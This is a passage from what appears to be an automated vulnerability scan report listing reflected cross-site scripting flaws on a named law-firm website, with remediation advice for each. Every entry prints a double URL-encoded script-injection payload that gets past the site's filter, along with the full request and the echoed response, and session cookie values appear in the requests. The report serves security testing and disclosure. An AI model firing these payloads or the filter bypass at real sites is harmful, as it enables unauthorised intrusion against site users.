User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js2bbc8"><script>alert(1)</script>5280505d079/ui.core.js" value="">
...[SNIP]...

2.109. http://www.wileyrein.com/js/ui.core.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.core.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79a0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e713c91dcce2 was submitted in the REST URL parameter 2. This input was echoed as 79a0d"><script>alert(1)</script>713c91dcce2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/ui.core.js79a0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e713c91dcce2 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/ui.core.js79a0d"><script>alert(1)</script>713c91dcce2" value="">
...[SNIP]...

2.110. http://www.wileyrein.com/js/ui.datepicker.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.datepicker.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33f74%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e75df592a80d was submitted in the REST URL parameter 1. This input was echoed as 33f74"><script>alert(1)</script>75df592a80d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js33f74%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e75df592a80d/ui.datepicker.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js33f74"><script>alert(1)</script>75df592a80d/ui.datepicker.js" value="">
...[SNIP]...

2.111. http://www.wileyrein.com/js/ui.datepicker.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.datepicker.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29ad5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee294e4483ea was submitted in the REST URL parameter 2. This input was echoed as 29ad5"><script>alert(1)</script>e294e4483ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/ui.datepicker.js29ad5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee294e4483ea HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/ui.datepicker.js29ad5"><script>alert(1)</script>e294e4483ea" value="">
...[SNIP]...

2.112. http://www.wileyrein.com/js/ui.dialog.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.dialog.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe969%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec77ca9823dd was submitted in the REST URL parameter 1. This input was echoed as fe969"><script>alert(1)</script>c77ca9823dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /jsfe969%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec77ca9823dd/ui.dialog.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/jsfe969"><script>alert(1)</script>c77ca9823dd/ui.dialog.js" value="">
...[SNIP]...

2.113. http://www.wileyrein.com/js/ui.dialog.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.dialog.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ae75%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6ccc3364de was submitted in the REST URL parameter 2. This input was echoed as 4ae75"><script>alert(1)</script>6ccc3364de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/ui.dialog.js4ae75%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6ccc3364de HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/ui.dialog.js4ae75"><script>alert(1)</script>6ccc3364de" value="">
...[SNIP]...

2.114. http://www.wileyrein.com/js/ui.draggable.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.draggable.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41fbd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3ba108ca8ed was submitted in the REST URL parameter 1. This input was echoed as 41fbd"><script>alert(1)</script>3ba108ca8ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js41fbd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3ba108ca8ed/ui.draggable.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js41fbd"><script>alert(1)</script>3ba108ca8ed/ui.draggable.js" value="">
...[SNIP]...

2.115. http://www.wileyrein.com/js/ui.draggable.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.draggable.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee808%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e982f7a16b81 was submitted in the REST URL parameter 2. This input was echoed as ee808"><script>alert(1)</script>982f7a16b81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/ui.draggable.jsee808%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e982f7a16b81 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/ui.draggable.jsee808"><script>alert(1)</script>982f7a16b81" value="">
...[SNIP]...

2.116. http://www.wileyrein.com/js/ui.resizable.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.resizable.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 159bb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eff8afb5f36e was submitted in the REST URL parameter 1. This input was echoed as 159bb"><script>alert(1)</script>ff8afb5f36e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js159bb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eff8afb5f36e/ui.resizable.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js159bb"><script>alert(1)</script>ff8afb5f36e/ui.resizable.js" value="">
...[SNIP]...

2.117. http://www.wileyrein.com/js/ui.resizable.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.resizable.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dd6d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea322173fb55 was submitted in the REST URL parameter 2. This input was echoed as 6dd6d"><script>alert(1)</script>a322173fb55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/ui.resizable.js6dd6d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea322173fb55 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/ui.resizable.js6dd6d"><script>alert(1)</script>a322173fb55" value="">
...[SNIP]...

2.118. http://www.wileyrein.com/rss/awards/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/awards/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4823f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e74755294a4f was submitted in the REST URL parameter 1. This input was echoed as 4823f"><script>alert(1)</script>74755294a4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss4823f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e74755294a4f/awards/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss4823f"><script>alert(1)</script>74755294a4f/awards/rss.xml" value="">
...[SNIP]...

2.119. http://www.wileyrein.com/rss/awards/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/awards/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ddba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb482c6d5ffe was submitted in the REST URL parameter 2. This input was echoed as 3ddba"><script>alert(1)</script>b482c6d5ffe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/awards3ddba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb482c6d5ffe/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/awards3ddba"><script>alert(1)</script>b482c6d5ffe/rss.xml" value="">
...[SNIP]...

2.120. http://www.wileyrein.com/rss/awards/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/awards/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4862c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e626bbbadd84 was submitted in the REST URL parameter 3. This input was echoed as 4862c"><script>alert(1)</script>626bbbadd84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/awards/rss.xml4862c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e626bbbadd84 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/awards/rss.xml4862c"><script>alert(1)</script>626bbbadd84" value="">
...[SNIP]...

2.121. http://www.wileyrein.com/rss/events/rss.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/events/rss.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96c9a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb17c06f0b56 was submitted in the REST URL parameter 1. This input was echoed as 96c9a"><script>alert(1)</script>b17c06f0b56 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss96c9a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb17c06f0b56/events/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss96c9a"><script>alert(1)</script>b17c06f0b56/events/rss.xml" value="">
...[SNIP]...

2.122. http://www.wileyrein.com/rss/events/rss.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/events/rss.xml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d1d6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f934a0d192 was submitted in the REST URL parameter 2. This input was echoed as 8d1d6"><script>alert(1)</script>3f934a0d192 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /rss/events8d1d6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f934a0d192/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/rss/events8d1d6"><script>alert(1)</script>3f934a0d192/rss.xml" value="">
...[SNIP]...

2.123. http://www.wileyrein.com/rss/events/rss.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/events/rss.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ac25%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7c854d93a was submitted in the REST URL parameter 3. This input was echoed as 5ac25"><script>alert(1)</script>a7c854d93a in the application's response.

